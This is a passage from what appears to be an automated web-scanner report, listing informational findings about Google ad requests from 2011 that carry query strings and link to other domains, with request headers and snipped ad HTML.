GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766864&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcwe-79-xss-dork-www.ovh.com.html&dt=1301748864014&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301748864027&frm=0&adk=1607234649&ga_vid=1820162902.1301748864&ga_sid=1301748864&ga_hid=1957583734&ga_fc=0&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=18&xpc=4y3R16wajz&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:53:47 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12595

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/cwe-79-xss-dork-www.ovh.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saprunbetter.com%26adT%3DSAP:%2BRun%2BBetter%26adU%3Dwww.intacct.com/BuyersGuide%26adT%3DAccounting%2BSolution%2BGuide%26adU%3DQuickBooks.com%26adT%3DQuickBooks%25E2%2584%25A2%2B20%2525%2BDiscount%26gl%3DUS&amp;usg=AFQjCNG7QpgG_4S717VcZuY1qYm00bZm9A" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.10. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998814&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fbloomberg.com.html&dt=1301749159639&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749159651&frm=0&adk=1607234649&ga_vid=1824435534.1301749160&ga_sid=1301749160&ga_hid=162966294&ga_fc=0&u_tz=-300&u_his=31&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895298&fu=0&ifi=1&dtd=16&xpc=S1mHzMfD9B&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:58:44 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14388

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/bloomberg.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DOptionsHouse.com%26adT%3DLearning%2BStock%2BTrading%26adU%3DoptionsXpress.com/FreeOptionsCoaching%26adT%3DCoaching%2Bon%2BStock%2BOptions%26adU%3DAmericanEnergyProperties.com%26adT%3DEarn%2Ba%2BMonthly%2BIncome%26gl%3DUS&amp;usg=AFQjCNGhRZfNEfKlrWfqHM3O-IO7kckkug" target=_blank><script>
...[SNIP]...
</script><img alt="Ads by Google" border=0 height=16 onload=tick('abg','_abg') src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script onload=tick('smajs','_smajs') src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.11. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767129&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcapec-86-xss-dork-cwe79-imp.fetchback.com.html&dt=1301749129231&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301749129246&frm=0&adk=1607234649&ga_vid=1008383386.1301749129&ga_sid=1301749129&ga_hid=81316242&ga_fc=0&u_tz=-300&u_his=28&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=20&xpc=UwOBICQN6X&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:58:13 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12296

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/capec-86-xss-dork-cwe79-imp.fetchback.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saprunbetter.com%26adT%3DSAP:%2BRun%2BBetter%26adU%3Dwww.opnet.com/network-diagram%26adT%3DNetwork%2BDiagram%2BTool%26adU%3Dwww.wincall.com%26adT%3DWinCall%2BCall%2BAccounting%26gl%3DUS&amp;usg=AFQjCNGKqkmNinpO1wokVjv08WJDdcPVVw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.12. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767200&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fbody.aol.com.html&dt=1301749200784&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749200796&frm=0&adk=1607234649&ga_vid=1501998640.1301749201&ga_sid=1301749201&ga_hid=1970542589&ga_fc=0&u_tz=-300&u_his=34&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895132&fu=0&ifi=1&dtd=17&xpc=nNGcw7qdmo&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:59:24 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12337

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/body.aol.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DFrontRange.com/Help-Desk-Software%26adT%3DHEAT%2BSoftware%26adU%3Dwww.saprunbetter.com%26adT%3DSAP:%2BRun%2BBetter%26adU%3Dwww.nimsoft.com/free-trial%26adT%3DNimsoft%2Bon%2BDemand%26gl%3DUS&amp;usg=AFQjCNENRhxyj3xcbnwkVFh_TRGsX8xE7w" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.13. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766975&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcdn.nypost.com.html&dt=1301748975392&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748975404&frm=0&adk=1607234649&ga_vid=1056174654.1301748975&ga_sid=1301748975&ga_hid=528080557&ga_fc=0&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=UKIz1jjcy9&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:55:39 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12480

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/cdn.nypost.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DFrontRange.com/Discovery%26adT%3DNetwork%2BDiscover%2BSoftware%26adU%3DColleges.CampusCorner.com%26adT%3DAccounting%2BColleges%26adU%3Dwww.accelops.net/DCMonitoring%26adT%3DNew%2BDataCenter%2BMonitoring%26gl%3DUS&amp;usg=AFQjCNHBUcb8OV4UTmdfliHwdxlll4f8ZQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.14. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcross-site-scripting-xss.www.courchevel.com.html&dt=1301748825197&bpp=5&shv=r20110324&jsv=r20110321-2&correlator=1301748825485&frm=0&adk=1607234649&ga_vid=1342641436.1301748826&ga_sid=1301748826&ga_hid=1862808054&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&eid=33895132&fu=0&ifi=1&dtd=324&xpc=XYKSf8Neza&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:53:10 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12150

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/cross-site-scripting-xss.www.courchevel.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.skinewgen.com%26adT%3DSki%2BSchool%2BCourchevel1850%26adU%3Dwww.chaletatlantique.com%26adT%3DChalet%2BAtlantique%26adU%3Dwww.altoedge.com/tapi-boards%26adT%3DCallURL%2B8%2BLine%2BTAPI%2BBoard%26gl%3DUS&amp;usg=AFQjCNGllpLNX1DCg2CeJS-cBvDIEzk8UQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.15. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767251&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fbroadband.espn.go.com.html&dt=1301749251073&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301749251085&frm=0&adk=1607234649&ga_vid=1914141624.1301749251&ga_sid=1301749251&ga_hid=73962557&ga_fc=0&u_tz=-300&u_his=38&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=Pobz10SBRs&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:00:15 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4288

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/broadband.espn.go.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhilips.LifelineSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNG45VgNSUgNuy2XmGsZn2WcvSkj-Q" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.16. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767179&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fbluefly.com.html&dt=1301749179548&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749179559&frm=0&adk=1607234649&ga_vid=1639178297.1301749180&ga_sid=1301749180&ga_hid=1722711275&ga_fc=0&u_tz=-300&u_his=32&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=19&xpc=BKPUSVHPKn&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:59:03 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12108

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/bluefly.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DMastersinLaw.TJSL.edu%26adT%3DMaster%2Bof%2BLaws%2BDegree%26adU%3Dwww.Fishing-In-Saskatchewan.com%26adT%3DSaskatchewan%2BFishing%26adU%3Ddegree-online.NECB.edu%26adT%3DNECB%25C2%25AE%2BBBA%2Bin%2BAccounting%26gl%3DUS&amp;usg=AFQjCNFBkHATPQr0Pnc2x5t5am2na9osXw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.17. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998820&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapitalone.com.html&dt=1301748910317&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301748910348&frm=0&adk=1607234649&ga_vid=326627036.1301748910&ga_sid=1301748910&ga_hid=1851845152&ga_fc=0&u_tz=-300&u_his=11&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&fu=0&ifi=1&dtd=71&xpc=2Bd1PTEyBl&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
